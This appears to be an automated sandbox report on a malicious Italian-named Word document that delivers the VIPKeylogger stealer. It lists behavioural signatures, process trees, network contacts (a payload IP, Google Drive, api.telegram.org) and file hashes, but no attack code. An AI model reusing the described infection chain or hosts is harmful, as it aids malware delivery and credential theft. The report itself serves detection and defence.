Malware Analysis Report

2024-11-13 15:34

Sample ID 241003-pzh12sxhjr
Target RICHIESTA_OFFERTA_RDO2400423.docx.doc
SHA256 b5b6a451d04745638c7ecf24dbcc73655bb5942bf63a8da317bd7a6badb8dddf
Tags
vipkeylogger discovery keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b5b6a451d04745638c7ecf24dbcc73655bb5942bf63a8da317bd7a6badb8dddf

Threat Level: Known bad

The file RICHIESTA_OFFERTA_RDO2400423.docx.doc was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Abuses OpenXML format to download file from external location

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Launches Equation Editor

Uses Task Scheduler COM API

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-03 12:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-03 12:45

Reported

2024-10-03 12:48

Platform

win7-20240708-en

Max time kernel

132s

Max time network

121s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1960 set thread context of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
File opened for modification C:\Windows\resources\0409\reproductivity.ini C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2432 wrote to memory of 1960 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 2432 wrote to memory of 1960 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 2432 wrote to memory of 1960 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 2432 wrote to memory of 1960 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 1960 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\tmtcy20306.exe C:\Users\Admin\AppData\Roaming\tmtcy20306.exe
PID 2856 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2856 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2856 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2856 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

"C:\Users\Admin\AppData\Roaming\tmtcy20306.exe"

C:\Users\Admin\AppData\Roaming\tmtcy20306.exe

"C:\Users\Admin\AppData\Roaming\tmtcy20306.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 154.216.20.22:80 154.216.20.22 tcp
US 154.216.20.22:80 154.216.20.22 tcp
US 154.216.20.22:80 154.216.20.22 tcp
US 8.8.8.8:53 drive.google.com udp
GB 216.58.212.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 172.217.169.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:80 www.microsoft.com tcp

Files

memory/2856-0-0x000000002FEA1000-0x000000002FEA2000-memory.dmp

memory/2856-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2856-2-0x000000007183D000-0x0000000071848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{9DF86D27-8A7D-4027-98EB-50F64C078FA4}

MD5 cc47876dc035fe3ca48192948d806ca1
SHA1 2a67a271b0f7b4cbadaef8afb85c234465e418b3
SHA256 01b6eb6b3a4c786e7881283337e990a9195ee11204808edd7f43a1476bf221db
SHA512 a7a3ed210010100c1820f8602cc13d2f734d6cd062aad8b751c36182b765554429586bcf7730c8918364b59afc784e761d96e9eb02b3820b3fee5ca6c843591c

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{07078B2D-E8BE-4FA2-B2D3-55C5D1E2E060}.FSD

MD5 d092ebfa8426820fb3e3c8e67cb6d545
SHA1 58e62650481a2e3a6c5b31c2480e9f1cbbdef133
SHA256 31b8185e91e90345cbec364bb458a4880c3ae513d767d681f034e3e980c2027b
SHA512 a5937d567e799e2f405b98ea760f8379e0301418b3e0e58d8d29162c6add23f7089325bc018b2f77c626331ced367e496d3f903fe5a2e03c903d10f44852e901

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 0a3b5d78829fe3da64cb94f6c4a8613d
SHA1 462fcedeceb308b8fb99ba2ab00031cf256f8942
SHA256 7b88abc149f95151cba12395110e77ec162ee650efcd7add633bb67b92ab1675
SHA512 b459bb526d3b9c78be35b68f7dc6dda6abe9d7254aea932aa512f5edff1c785675fee54b49af30a569d4cb1afc99b6d5da994ffdca963c3d9caeb60a32a82e29

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\tmtzxc[1].doc

MD5 08d1a4e26971fd55013dbc7d2744b2a5
SHA1 dd813694fc67b536f242ae7dd3deff14458b82ba
SHA256 fd1ca8e9ebe962f23b55669ea495bdb32073b7359031e80a7067d387c0bfa8dc
SHA512 3c34748ed68738a24d6c7f1482b4b2f5a26fb6c2a85a1fc0a5303123928fb56974532af9d43b9bb9027558a03be79cf31b48a0c4cb28c41fd833f25e8bb035b6

\Users\Admin\AppData\Roaming\tmtcy20306.exe

MD5 f7e702effaaad33faa0cbc4f87da2d07
SHA1 b8be783f38b987f8c88f7de258d69a648033be72
SHA256 a44de00550c4b3adc9409fd1fb559cab02a9efab1a1352ff07b896a2cea98678
SHA512 43e29d3926317d7234f333e41177cafce5e4bd297d3a854f7959aad341eb68748b57113c41bf9173b5d838c7460ca146c21ba2dbf982535e5ad736118773cec9

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 7b4cd0c80af21ca197305de4d8258f44
SHA1 cd8f4d39a939711c5f40ab6507b0c8a161d9a0d8
SHA256 36563513f6361fd28ef63676a26e57bfe8b5fc4fd5ac311e61a613f4d9b8ca18
SHA512 2bb7fc23d397ed28489621bc6fc93b0f06c2d4093097958c28fad821d8175a924695f6c6983be66b3268409322245a13398fc0d7c732f6576e0da0184fc8cd31

\Users\Admin\AppData\Local\Temp\nst7CA2.tmp\System.dll

MD5 9625d5b1754bc4ff29281d415d27a0fd
SHA1 80e85afc5cccd4c0a3775edbb90595a1a59f5ce0
SHA256 c2f405d7402f815d0c3fadd9a50f0bbbb1bab9aa38fe347823478a2587299448
SHA512 dce52b640897c2e8dbfd0a1472d5377fa91fb9cf1aeff62604d014bccbe5b56af1378f173132abeb0edd18c225b9f8f5e3d3e72434aed946661e036c779f165b

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2856-113-0x000000007183D000-0x0000000071848000-memory.dmp

memory/2944-136-0x0000000000480000-0x00000000014E2000-memory.dmp

memory/2944-137-0x0000000000480000-0x00000000014E2000-memory.dmp

memory/2944-138-0x0000000000480000-0x00000000004C8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-03 12:45

Reported

2024-10-03 12:48

Platform

win10v2004-20240802-en

Max time kernel

133s

Max time network

123s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RICHIESTA_OFFERTA_RDO2400423.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 154.216.20.22:80 154.216.20.22 tcp
US 154.216.20.22:80 154.216.20.22 tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 22.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/2420-0-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-1-0x00007FFE07A2D000-0x00007FFE07A2E000-memory.dmp

memory/2420-2-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-3-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-6-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-5-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-4-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-9-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-12-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-16-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-17-0x00007FFDC5820000-0x00007FFDC5830000-memory.dmp

memory/2420-15-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-14-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-13-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-11-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-10-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-8-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-7-0x00007FFDC7A10000-0x00007FFDC7A20000-memory.dmp

memory/2420-19-0x00007FFDC5820000-0x00007FFDC5830000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4329235D\tmtzxc[1].doc

MD5 08d1a4e26971fd55013dbc7d2744b2a5
SHA1 dd813694fc67b536f242ae7dd3deff14458b82ba
SHA256 fd1ca8e9ebe962f23b55669ea495bdb32073b7359031e80a7067d387c0bfa8dc
SHA512 3c34748ed68738a24d6c7f1482b4b2f5a26fb6c2a85a1fc0a5303123928fb56974532af9d43b9bb9027558a03be79cf31b48a0c4cb28c41fd833f25e8bb035b6

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 5fc1623354fdbbbbff11c2a2aa132f92
SHA1 d0d3c0b5a955e67ce2341d3a0cbb6ef0ac79dcc0
SHA256 d4058c628c70dbf0b45005a0816294305aa04f41e0b7da7e5d2eeb3db7e53184
SHA512 09a415dc3374b0adb92ff1af29737c4bcf0b5e4ec3ac72f2de41d5cee6f6b32213f0577f003522593869795846d0aff3caf3321e061f8d98cbb2e58afbd13a6f

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/2420-79-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-80-0x00007FFE07A2D000-0x00007FFE07A2E000-memory.dmp

memory/2420-81-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

memory/2420-82-0x00007FFE07990000-0x00007FFE07B85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDBE2.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810